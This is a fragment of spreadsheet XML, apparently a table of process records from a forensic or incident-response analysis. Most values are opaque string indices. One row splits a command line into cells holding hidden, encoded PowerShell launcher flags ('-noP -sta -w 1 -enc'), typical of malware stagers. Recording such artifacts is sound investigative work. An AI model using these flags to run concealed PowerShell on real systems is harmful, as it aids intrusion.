      </c>
      <c r="M46" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="47" spans="1:14" x14ac:dyDescent="0.25">
      <c r="A47">
        <v>1812</v>
      </c>
      <c r="B47">
        <v>3484</v>
      </c>
      <c r="C47" t="s">
        <v>144</v>
      </c>
      <c r="D47" t="s">
        <v>145</v>
      </c>
      <c r="E47" t="s">
        <v>146</v>
      </c>
      <c r="F47">
        <v>18</v>
      </c>
      <c r="G47">
        <v>446</v>
      </c>
      <c r="H47">
        <v>1</v>
      </c>
      <c r="I47" t="s">
        <v>8</v>
      </c>
      <c r="J47" s="1">
        <v>43534</v>
      </c>
      <c r="K47" t="s">
        <v>147</v>
      </c>
      <c r="L47" t="s">
        <v>57</v>
      </c>
      <c r="M47" t="s">
        <v>55</v>
      </c>
      <c r="N47" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="48" spans="1:14" x14ac:dyDescent="0.25">
      <c r="A48">
        <v>1984</v>
      </c>
      <c r="B48">
        <v>2936</v>
      </c>
      <c r="C48" t="s">
        <v>148</v>
      </c>
      <c r="D48" t="s">
        <v>149</v>
      </c>
      <c r="E48">
        <v>6</v>
      </c>
      <c r="F48">
        <v>239</v>
      </c>
      <c r="G48">
        <v>0</v>
      </c>
      <c r="H48" t="s">
        <v>8</v>
      </c>
      <c r="I48" s="1">
        <v>43534</v>
      </c>
      <c r="J48" t="s">
        <v>150</v>
      </c>
      <c r="K48" t="s">
        <v>57</v>
      </c>
      <c r="L48" t="s">
        <v>55</v>
      </c>
      <c r="M4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4FB6-428F-499F-B112-9E1B8E687380}">
  <dimension ref="A1:Y18"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A18" sqref="A18"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="13" customWidth="1"/>
    <col min="2" max="2" width="11.28515625" customWidth="1"/>
    <col min="3" max="3" width="16.7109375" customWidth="1"/>
    <col min="4" max="4" width="15.5703125" customWidth="1"/>
    <col min="8" max="8" width="13.7109375" customWidth="1"/>
    <col min="9" max="9" width="21.5703125" customWidth="1"/>
    <col min="10" max="10" width="16.28515625" customWidth="1"/>
    <col min="11" max="11" width="20.42578125" customWidth="1"/>
    <col min="14" max="14" width="13.28515625" customWidth="1"/>
    <col min="16" max="16" width="57" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:25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151</v>
      </c>
      <c r="L1" t="s">
        <v>152</v>
      </c>
      <c r="M1" t="s">
        <v>153</v>
      </c>
    </row>
    <row r="3" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3">
        <v>4</v>
      </c>
      <c r="B3">
        <v>0</v>
      </c>
      <c r="C3" t="s">
        <v>53</v>
      </c>
      <c r="D3" t="s">
        <v>54</v>
      </c>
      <c r="E3">
        <v>90</v>
      </c>
      <c r="F3">
        <v>566</v>
      </c>
      <c r="G3" t="s">
        <v>55</v>
      </c>
      <c r="H3" t="s">
        <v>8</v>
      </c>
      <c r="I3" s="1">
        <v>43534</v>
      </c>
      <c r="J3" t="s">
        <v>56</v>
      </c>
      <c r="K3" t="s">
        <v>57</v>
      </c>
      <c r="L3" t="s">
        <v>55</v>
      </c>
      <c r="M3" t="s">
        <v>101</v>
      </c>
      <c r="N3" t="s">
        <v>101</v>
      </c>
      <c r="O3" t="s">
        <v>101</v>
      </c>
    </row>
    <row r="4" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4" t="s">
        <v>154</v>
      </c>
      <c r="B4">
        <v>252</v>
      </c>
      <c r="C4">
        <v>4</v>
      </c>
      <c r="D4" t="s">
        <v>59</v>
      </c>
      <c r="E4" t="s">
        <v>60</v>
      </c>
      <c r="F4">
        <v>2</v>
      </c>
      <c r="G4">
        <v>29</v>
      </c>
      <c r="H4" t="s">
        <v>55</v>
      </c>
      <c r="I4" t="s">
        <v>8</v>
      </c>
      <c r="J4" s="1">
        <v>43534</v>
      </c>
      <c r="K4" t="s">
        <v>56</v>
      </c>
      <c r="L4" t="s">
        <v>57</v>
      </c>
      <c r="M4" t="s">
        <v>55</v>
      </c>
      <c r="N4" t="s">
        <v>155</v>
      </c>
      <c r="O4" t="s">
        <v>156</v>
      </c>
      <c r="P4" t="s">
        <v>156</v>
      </c>
    </row>
    <row r="5" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A5">
        <v>376</v>
      </c>
      <c r="B5">
        <v>360</v>
      </c>
      <c r="C5" t="s">
        <v>61</v>
      </c>
      <c r="D5" t="s">
        <v>67</v>
      </c>
      <c r="E5">
        <v>8</v>
      </c>
      <c r="F5">
        <v>290</v>
      </c>
      <c r="G5">
        <v>1</v>
      </c>
      <c r="H5" t="s">
        <v>8</v>
      </c>
      <c r="I5" s="1">
        <v>43534</v>
      </c>
      <c r="J5" t="s">
        <v>66</v>
      </c>
      <c r="K5" t="s">
        <v>57</v>
      </c>
      <c r="L5" t="s">
        <v>55</v>
      </c>
      <c r="M5" t="s">
        <v>157</v>
      </c>
      <c r="N5" t="s">
        <v>158</v>
      </c>
      <c r="O5" t="s">
        <v>159</v>
      </c>
      <c r="P5" t="s">
        <v>160</v>
      </c>
      <c r="Q5" t="s">
        <v>161</v>
      </c>
      <c r="R5" t="s">
        <v>162</v>
      </c>
      <c r="S5" t="s">
        <v>163</v>
      </c>
      <c r="T5" t="s">
        <v>164</v>
      </c>
      <c r="U5" t="s">
        <v>165</v>
      </c>
      <c r="V5" t="s">
        <v>166</v>
      </c>
      <c r="W5" t="s">
        <v>167</v>
      </c>
      <c r="X5" t="s">
        <v>168</v>
      </c>
      <c r="Y5" t="s">
        <v>169</v>
      </c>
    </row>
    <row r="6" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A6" t="s">
        <v>154</v>
      </c>
      <c r="B6">
        <v>1540</v>
      </c>
      <c r="C6">
        <v>376</v>
      </c>
      <c r="D6" t="s">
        <v>102</v>
      </c>
      <c r="E6" t="s">
        <v>125</v>
      </c>
      <c r="F6">
        <v>2</v>
      </c>
      <c r="G6">
        <v>50</v>
      </c>
      <c r="H6">
        <v>1</v>
      </c>
      <c r="I6" t="s">
        <v>8</v>
      </c>
      <c r="J6" s="1">
        <v>43534</v>
      </c>
      <c r="K6" t="s">
        <v>118</v>
      </c>
      <c r="L6" t="s">
        <v>57</v>
      </c>
      <c r="M6" t="s">
        <v>55</v>
      </c>
      <c r="N6" t="s">
        <v>170</v>
      </c>
      <c r="O6" t="s">
        <v>171</v>
      </c>
      <c r="P6" t="s">
        <v>172</v>
      </c>
    </row>
    <row r="7" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A7">
        <v>404</v>
      </c>
      <c r="B7">
        <v>360</v>
      </c>
      <c r="C7" t="s">
        <v>68</v>
      </c>
      <c r="D7" t="s">
        <v>69</v>
      </c>
      <c r="E7">
        <v>3</v>
      </c>
      <c r="F7">
        <v>114</v>
      </c>
      <c r="G7">
        <v>1</v>
      </c>
      <c r="H7" t="s">
        <v>8</v>
      </c>
      <c r="I7" s="1">
        <v>43534</v>
      </c>
      <c r="J7" t="s">
        <v>66</v>
      </c>
      <c r="K7" t="s">
        <v>57</v>
      </c>
      <c r="L7" t="s">
        <v>55</v>
      </c>
      <c r="M7" t="s">
        <v>173</v>
      </c>
      <c r="N7" t="s">
        <v>68</v>
      </c>
      <c r="O7" t="s">
        <v>174</v>
      </c>
    </row>
    <row r="8" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A8">
        <v>3484</v>
      </c>
      <c r="B8">
        <v>3692</v>
      </c>
      <c r="C8" t="s">
        <v>121</v>
      </c>
      <c r="D8" t="s">
        <v>122</v>
      </c>
      <c r="E8">
        <v>31</v>
      </c>
      <c r="F8">
        <v>946</v>
      </c>
      <c r="G8">
        <v>1</v>
      </c>
      <c r="H8" t="s">
        <v>8</v>
      </c>
      <c r="I8" s="1">
        <v>43534</v>
      </c>
      <c r="J8" t="s">
        <v>118</v>
      </c>
      <c r="K8" t="s">
        <v>57</v>
      </c>
      <c r="L8" t="s">
        <v>55</v>
      </c>
      <c r="M8" t="s">
        <v>175</v>
      </c>
      <c r="N8" t="s">
        <v>176</v>
      </c>
      <c r="O8" t="s">
        <v>176</v>
      </c>
    </row>
    <row r="9" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A9" t="s">
        <v>154</v>
      </c>
      <c r="B9">
        <v>992</v>
      </c>
      <c r="C9">
        <v>3484</v>
      </c>
      <c r="D9" t="s">
        <v>131</v>
      </c>
      <c r="E9" t="s">
        <v>132</v>
      </c>
      <c r="F9">
        <v>10</v>
      </c>
      <c r="G9">
        <v>461</v>
      </c>
      <c r="H9">
        <v>1</v>
      </c>
      <c r="I9" t="s">
        <v>8</v>
      </c>
      <c r="J9" s="1">
        <v>43534</v>
      </c>
      <c r="K9" t="s">
        <v>130</v>
      </c>
      <c r="L9" t="s">
        <v>57</v>
      </c>
      <c r="M9" t="s">
        <v>55</v>
      </c>
      <c r="N9" t="s">
        <v>177</v>
      </c>
      <c r="O9" t="s">
        <v>178</v>
      </c>
      <c r="P9" t="s">
        <v>179</v>
      </c>
      <c r="Q9" t="s">
        <v>180</v>
      </c>
      <c r="R9" t="e">
        <f>-restart</f>
        <v>#NAME?</v>
      </c>
      <c r="S9" t="s">
        <v>181</v>
      </c>
      <c r="T9" t="s">
        <v>182</v>
      </c>
      <c r="U9" t="s">
        <v>178</v>
      </c>
      <c r="V9" t="s">
        <v>179</v>
      </c>
    </row>
    <row r="10" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A10" t="s">
        <v>183</v>
      </c>
      <c r="B10">
        <v>1776</v>
      </c>
      <c r="C10">
        <v>992</v>
      </c>
      <c r="D10" t="s">
        <v>131</v>
      </c>
      <c r="E10" t="s">
        <v>133</v>
      </c>
      <c r="F10">
        <v>29</v>
      </c>
      <c r="G10">
        <v>706</v>
      </c>
      <c r="H10">
        <v>1</v>
      </c>
      <c r="I10" t="s">
        <v>8</v>
      </c>
      <c r="J10" s="1">
        <v>43534</v>
      </c>
      <c r="K10" t="s">
        <v>130</v>
      </c>
      <c r="L10" t="s">
        <v>57</v>
      </c>
      <c r="M10" t="s">
        <v>55</v>
      </c>
      <c r="N10" t="s">
        <v>177</v>
      </c>
      <c r="O10" t="s">
        <v>178</v>
      </c>
      <c r="P10" t="s">
        <v>179</v>
      </c>
      <c r="Q10" t="s">
        <v>180</v>
      </c>
      <c r="R10" t="s">
        <v>184</v>
      </c>
      <c r="S10" t="s">
        <v>185</v>
      </c>
      <c r="T10" t="s">
        <v>186</v>
      </c>
      <c r="U10" t="s">
        <v>182</v>
      </c>
      <c r="V10" t="s">
        <v>178</v>
      </c>
      <c r="W10" t="s">
        <v>179</v>
      </c>
    </row>
    <row r="11" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A11" t="s">
        <v>154</v>
      </c>
      <c r="B11">
        <v>2700</v>
      </c>
      <c r="C11">
        <v>3484</v>
      </c>
      <c r="D11" t="s">
        <v>128</v>
      </c>
      <c r="E11" t="s">
        <v>129</v>
      </c>
      <c r="F11">
        <v>13</v>
      </c>
      <c r="G11">
        <v>142</v>
      </c>
      <c r="H11">
        <v>1</v>
      </c>
      <c r="I11" t="s">
        <v>8</v>
      </c>
      <c r="J11" s="1">
        <v>43534</v>
      </c>
      <c r="K11" t="s">
        <v>130</v>
      </c>
      <c r="L11" t="s">
        <v>57</v>
      </c>
      <c r="M11" t="s">
        <v>55</v>
      </c>
      <c r="N11" t="s">
        <v>187</v>
      </c>
      <c r="O11" t="s">
        <v>188</v>
      </c>
      <c r="P11" t="s">
        <v>188</v>
      </c>
    </row>
    <row r="12" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A12" t="s">
        <v>154</v>
      </c>
      <c r="B12">
        <v>1812</v>
      </c>
      <c r="C12">
        <v>3484</v>
      </c>
      <c r="D12" t="s">
        <v>144</v>
      </c>
      <c r="E12" t="s">
        <v>145</v>
      </c>
      <c r="F12" t="s">
        <v>146</v>
      </c>
      <c r="G12">
        <v>18</v>
      </c>
      <c r="H12">
        <v>446</v>
      </c>
      <c r="I12">
        <v>1</v>
      </c>
      <c r="J12" t="s">
        <v>8</v>
      </c>
      <c r="K12" s="1">
        <v>43534</v>
      </c>
      <c r="L12" t="s">
        <v>147</v>
      </c>
      <c r="M12" t="s">
        <v>57</v>
      </c>
      <c r="N12" t="s">
        <v>55</v>
      </c>
      <c r="O12" t="s">
        <v>189</v>
      </c>
      <c r="P12" t="s">
        <v>145</v>
      </c>
      <c r="Q12" t="s">
        <v>190</v>
      </c>
      <c r="R12" t="s">
        <v>191</v>
      </c>
      <c r="S12" t="s">
        <v>145</v>
      </c>
    </row>
    <row r="13" spans="1:25" s="3" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A13" s="3">
        <v>3008</v>
      </c>
      <c r="B13" s="3">
        <v>3692</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>123</v>
      </c>
      <c r="D13" s="3" t="s">
        <v>124</v>
      </c>
      <c r="E13" s="3">
        <v>1</v>
      </c>
      <c r="F13" s="3">
        <v>25</v>
      </c>
      <c r="G13" s="3">
        <v>1</v>
      </c>
      <c r="H13" s="3" t="s">
        <v>8</v>
      </c>
      <c r="I13" s="4">
        <v>43534</v>
      </c>
      <c r="J13" s="3" t="s">
        <v>118</v>
      </c>
      <c r="K13" s="3" t="s">
        <v>57</v>
      </c>
      <c r="L13" s="3" t="s">
        <v>55</v>
      </c>
      <c r="M13" s="3" t="s">
        <v>192</v>
      </c>
      <c r="N13" s="3" t="s">
        <v>193</v>
      </c>
      <c r="O13" s="3" t="s">
        <v>194</v>
      </c>
      <c r="P13" s="5" t="s">
        <v>195</v>
      </c>
      <c r="Q13" s="3" t="s">
        <v>193</v>
      </c>
    </row>
    <row r="14" spans="1:25" s="3" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A14" s="3" t="s">
        <v>154</v>
      </c>
      <c r="B14" s="3">
        <v>3672</v>
      </c>
      <c r="C14" s="3">
        <v>3008</v>
      </c>
      <c r="D14" s="3" t="s">
        <v>126</v>
      </c>
      <c r="E14" s="3" t="s">
        <v>127</v>
      </c>
      <c r="F14" s="3">
        <v>12</v>
      </c>
      <c r="G14" s="3">
        <v>382</v>
      </c>
      <c r="H14" s="3">
        <v>1</v>
      </c>
      <c r="I14" s="3" t="s">
        <v>8</v>
      </c>
      <c r="J14" s="4">
        <v>43534</v>
      </c>
      <c r="K14" s="3" t="s">
        <v>118</v>
      </c>
      <c r="L14" s="3" t="s">
        <v>57</v>
      </c>
      <c r="M14" s="3" t="s">
        <v>55</v>
      </c>
      <c r="N14" s="3" t="s">
        <v>196</v>
      </c>
      <c r="O14" s="3" t="s">
        <v>197</v>
      </c>
      <c r="P14" s="6" t="e">
        <f>-noP</f>
        <v>#NAME?</v>
      </c>
      <c r="Q14" s="3" t="e">
        <f>-sta</f>
        <v>#NAME?</v>
      </c>
      <c r="R14" s="3" t="e">
        <f>-w</f>
        <v>#NAME?</v>
      </c>
      <c r="S14" s="3">
        <v>1</v>
      </c>
      <c r="T14" s="3" t="e">
        <f>-enc</f>
        <v>#NAME?</v>
      </c>
      <c r="U14" s="3" t="s">
        <v>198</v>
      </c>
      <c r="V14" s="3" t="s">
        <v>199</v>
      </c>
    </row>
    <row r="15" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A15">
        <v>1984</v>
      </c>
      <c r="B15">
        <v>2936</v>
      </c>
      <c r="C15" t="s">
        <v>148</v>
      </c>
      <c r="D15" t="s">
        <v>149</v>
      </c>
      <c r="E15">
        <v>6</v>
      </c>
      <c r="F15">
        <v>239</v>
      </c>
      <c r="G15">
        <v>0</v>
      </c>
      <c r="H15" t="s">
        <v>8</v>
      </c>
      <c r="I15" s="1">
        <v>43534</v>
      </c>
      <c r="J15" t="s">
        <v>150</v>
      </c>
      <c r="K15" t="s">
        <v>57</v>
      </c>
      <c r="L15" t="s">
        <v>55</v>
      </c>
      <c r="M15" t="s">
        <v>177</v>
      </c>
      <c r="N15" t="s">
        <v>200</v>
      </c>
      <c r="O15" t="s">
        <v>201</v>
      </c>
      <c r="P15" t="s">
        <v>101</v>
      </c>
      <c r="Q15" t="s">
        <v>101</v>
      </c>
    </row>
    <row r="18" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A18" t="s">
        <v>202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BC05-8C38-49F7-B546-70C3CD711B43}">
  <dimension ref="A1:G134"/>
  <sheetViews>
    <sheetView topLeftCell="A106" workbookViewId="0">
      <selection activeCell="E134" sqref="E134"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="17.7109375" customWidth="1"/>
    <col min="2" max="2" width="14.42578125" customWidth="1"/>
    <col min="3" max="3" width="18.28515625" customWidth="1"/>
    <col min="4" max="4" width="24.140625" customWidth="1"/>
    <col min="5" max="5" width="57.28515625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A1" t="s">
        <v>203</v>
      </c>
      <c r="B1" t="s">
        <v>1</v>
      </c>
      <c r="C1" t="s">
        <v>204</v>
      </c>
      <c r="D1" t="s">
        <v>205</v>
      </c>
      <c r="E1" t="s">
        <v>153</v>
      </c>
      <c r="F1" t="s">
        <v>51</v>
      </c>
      <c r="G1" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="3" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A3" t="s">
        <v>206</v>
      </c>
      <c r="B3" t="s">
        <v>2</v>
      </c>
      <c r="C3" t="s">
        <v>207</v>
      </c>
      <c r="D3" t="s">
        <v>208</v>
      </c>
      <c r="E3" t="s">
        <v>209</v>
      </c>
      <c r="F3" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="4" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A4" t="s">
        <v>210</v>
      </c>
      <c r="B4" t="s">
        <v>211</v>
      </c>
      <c r="C4" t="s">
        <v>212</v>
      </c>
      <c r="D4" t="s">
        <v>213</v>
      </c>
      <c r="E4" t="s">
        <v>214</v>
      </c>
      <c r="F4" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="5" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A5" t="s">
        <v>215</v>
      </c>
      <c r="B5" t="s">
        <v>216</v>
      </c>
      <c r="C5" t="s">
        <v>217</v>
      </c>
      <c r="D5" t="s">
        <v>218</v>
      </c>
      <c r="E5" t="s">
        <v>219</v>
      </c>
      <c r="F5" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="6" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6" t="s">
        <v>220</v>
      </c>
      <c r="B6" t="s">
        <v>221</v>
      </c>
      <c r="C6" t="s">
        <v>222</v>
      </c>
      <c r="D6" t="s">
        <v>223</v>
      </c>
      <c r="E6" t="s">
        <v>224</v>
      </c>
      <c r="F6" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="7" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A7" t="s">
        <v>225</v>
      </c>
      <c r="B7" t="s">
        <v>226</v>
      </c>
      <c r="C7" t="s">
        <v>227</v>
      </c>
      <c r="D7" t="s">
        <v>228</v>
      </c>
      <c r="E7" t="s">
        <v>229</v>
      </c>
      <c r="F7" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="8" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A8" t="s">
        <v>230</v>
      </c>
      <c r="B8" t="s">
        <v>231</v>
      </c>
      <c r="C8" t="s">
        <v>217</v>
      </c>
      <c r="D8" t="s">
        <v>232</v>
      </c>
      <c r="E8" t="s">
        <v>233</v>
      </c>
      <c r="F8" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="9" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A9" t="s">
        <v>234</v>
      </c>
      <c r="B9" t="s">
        <v>235</v>
      </c>
      <c r="C9" t="s">
        <v>236</v>
      </c>
      <c r="D9" t="s">
        <v>237</v>
      </c>
      <c r="E9" t="s">
        <v>238</v>
      </c>
      <c r="F9" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="10" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A10" t="s">
        <v>239</v>
      </c>
      <c r="B10" t="s">
        <v>240</v>
      </c>
      <c r="C10" t="s">
        <v>241</v>
      </c>
      <c r="D10" t="s">
        <v>242</v>
      </c>
      <c r="E10" t="s">
        <v>243</v>
      </c>
      <c r="F10" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="11" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11" t="s">
        <v>244</v>
      </c>
      <c r="B11" t="s">
        <v>245</v>
      </c>
      <c r="C11" t="s">
        <v>246</v>
      </c>
      <c r="D11" t="s">
        <v>247</v>
      </c>
      <c r="E11" t="s">
        <v>248</v>
      </c>
      <c r="F11" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="12" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12" t="s">
        <v>249</v>
      </c>
      <c r="B12" t="s">
        <v>250</v>
      </c>
      <c r="C12" t="s">
        <v>251</v>
      </c>
      <c r="D12" t="s">
        <v>252</v>
      </c>
      <c r="E12" t="s">
        <v>253</v>
      </c>
      <c r="F12" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="13" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A13" t="s">
        <v>254</v>
      </c>
      <c r="B13" t="s">
        <v>255</v>
      </c>
      <c r="C13" t="s">
        <v>256</v>
      </c>
      <c r="D13" t="s">
        <v>257</v>
      </c>
      <c r="E13" t="s">
        <v>258</v>
      </c>
      <c r="F13" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="14" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A14" t="s">
        <v>259</v>
      </c>
      <c r="B14" t="s">
        <v>260</v>
      </c>
      <c r="C14" t="s">
        <v>261</v>
      </c>
      <c r="D14" t="s">
        <v>262</v>
      </c>
      <c r="E14" t="s">
        <v>263</v>
      </c>
      <c r="F14" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="15" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A15" t="s">
        <v>264</v>
      </c>
      <c r="B15" t="s">
        <v>265</v>
      </c>
      <c r="C15" t="s">
        <v>217</v>
      </c>
      <c r="D15" t="s">
        <v>266</v>
      </c>
      <c r="E15" t="s">
        <v>267</v>
      </c>
      <c r="F15" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="16" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A16" t="s">
        <v>268</v>
      </c>
      <c r="B16" t="s">
        <v>269</v>
      </c>
      <c r="C16" t="s">
        <v>270</v>
      </c>
      <c r="D16" t="s">
        <v>271</v>
      </c>
      <c r="E16" t="s">
        <v>272</v>
      </c>
      <c r="F16" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17" t="s">
        <v>273</v>
      </c>
      <c r="B17" t="s">
        <v>274</v>
      </c>
      <c r="C17" t="s">
        <v>275</v>
      </c>
      <c r="D17" t="s">
        <v>276</v>
      </c>
      <c r="E17" t="s">
        <v>277</v>
      </c>
      <c r="F17" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18" t="s">
        <v>278</v>
      </c>
      <c r="B18" t="s">
        <v>279</v>
      </c>
      <c r="C18" t="s">
        <v>227</v>
      </c>
      <c r="D18" t="s">
        <v>280</v>
      </c>
      <c r="E18" t="s">
        <v>281</v>
      </c>
      <c r="F18" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19" t="s">
        <v>282</v>
      </c>
      <c r="B19" t="s">
        <v>283</v>
      </c>
      <c r="C19" t="s">
        <v>217</v>
      </c>
      <c r="D19" t="s">
        <v>284</v>
      </c>
      <c r="E19" t="s">
        <v>285</v>
      </c>
      <c r="F19" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20" t="s">
        <v>286</v>
      </c>
      <c r="B20" t="s">
        <v>287</v>
      </c>
      <c r="C20" t="s">
        <v>275</v>
      </c>
      <c r="D20" t="s">
        <v>288</v>
      </c>
      <c r="E20" t="s">
        <v>289</v>
      </c>
      <c r="F20" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="21" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21" t="s">
        <v>290</v>
      </c>
      <c r="B21" t="s">
        <v>291</v>
      </c>
      <c r="C21" t="s">
        <v>292</v>
      </c>
      <c r="D21" t="s">
        <v>293</v>
      </c>
      <c r="E21" t="s">
        <v>294</v>
      </c>
      <c r="F21" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="22" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22" t="s">
        <v>295</v>
      </c>
      <c r="B22" t="s">
        <v>296</v>
      </c>
      <c r="C22" t="s">
        <v>297</v>
      </c>
      <c r="D22" t="s">
        <v>298</v>
      </c>
      <c r="E22" t="s">
        <v>299</v>
      </c>
      <c r="F22" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="23" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23" t="s">
        <v>300</v>
      </c>
      <c r="B23" t="s">
        <v>301</v>
      </c>
      <c r="C23" t="s">
        <v>302</v>
      </c>
      <c r="D23" t="s">
        <v>303</v>
      </c>
      <c r="E23" t="s">
        <v>304</v>
      </c>
      <c r="F23" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="24" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24" t="s">
        <v>305</v>
      </c>
      <c r="B24" t="s">
        <v>306</v>
      </c>
      <c r="C24" t="s">
        <v>251</v>
      </c>
      <c r="D24" t="s">
        <v>307</v>
      </c>
      <c r="E24" t="s">
        <v>308</v>
      </c>
      <c r="F24" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="25" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25" t="s">
        <v>309</v>
      </c>
      <c r="B25" t="s">
        <v>310</v>
      </c>
      <c r="C25" t="s">
        <v>311</v>
      </c>
      <c r="D25" t="s">
        <v>312</v>
      </c>
      <c r="E25" t="s">
        <v>313</v>
      </c>
      <c r="F25" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="26" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26" t="s">
        <v>314</v>
      </c>
      <c r="B26" t="s">
        <v>315</v>
      </c>
      <c r="C26" t="s">
        <v>270</v>
      </c>
      <c r="D26" t="s">
        <v>316</v>
      </c>
      <c r="E26" t="s">
        <v>317</v>
      </c>
      <c r="F26" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="27" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27" t="s">
        <v>318</v>
      </c>
      <c r="B27" t="s">
        <v>319</v>
      </c>
      <c r="C27" t="s">
        <v>320</v>
      </c>
      <c r="D27" t="s">
        <v>321</v>
      </c>
      <c r="E27" t="s">
        <v>322</v>
      </c>
      <c r="F27" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="28" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28" t="s">
        <v>323</v>
      </c>
      <c r="B28" t="s">
        <v>324</v>
      </c>
      <c r="C28" t="s">
        <v>261</v>
      </c>
      <c r="D28" t="s">
        <v>325</v>
      </c>
      <c r="E28" t="s">
        <v>326</v>
      </c>
      <c r="F28" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="29" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29" t="s">
        <v>327</v>
      </c>
      <c r="B29" t="s">
        <v>328</v>
      </c>
      <c r="C29" t="s">
        <v>329</v>
      </c>
      <c r="D29" t="s">
        <v>330</v>
      </c>
      <c r="E29" t="s">
        <v>331</v>
      </c>
      <c r="F29" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="30" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30" t="s">
        <v>332</v>
      </c>
      <c r="B30" t="s">
        <v>333</v>
      </c>
      <c r="C30" t="s">
        <v>261</v>
      </c>
      <c r="D30" t="s">
        <v>334</v>
      </c>
      <c r="E30" t="s">
        <v>335</v>
      </c>
      <c r="F30" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="31" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A31" t="s">
        <v>336</v>
      </c>
      <c r="B31" t="s">
        <v>337</v>
      </c>
      <c r="C31" t="s">
        <v>338</v>
      </c>
      <c r="D31" t="s">
        <v>339</v>
      </c>
      <c r="E31" t="s">
        <v>340</v>
      </c>
      <c r="F31" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="32" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A32" t="s">
        <v>341</v>
      </c>
      <c r="B32" t="s">
        <v>342</v>
      </c>
      <c r="C32" t="s">
        <v>227</v>
      </c>
      <c r="D32" t="s">
        <v>343</v>
      </c>
      <c r="E32" t="s">
        <v>344</v>
      </c>
      <c r="F32" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="33" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A33" t="s">
        <v>345</v>
      </c>
      <c r="B33" t="s">
        <v>346</v>
      </c>
      <c r="C33" t="s">
        <v>347</v>
      </c>
      <c r="D33" t="s">
        <v>348</v>
      </c>
      <c r="E33" t="s">
        <v>349</v>
      </c>
      <c r="F33" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="34" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A34" t="s">
        <v>350</v>
      </c>
      <c r="B34" t="s">
        <v>351</v>
      </c>
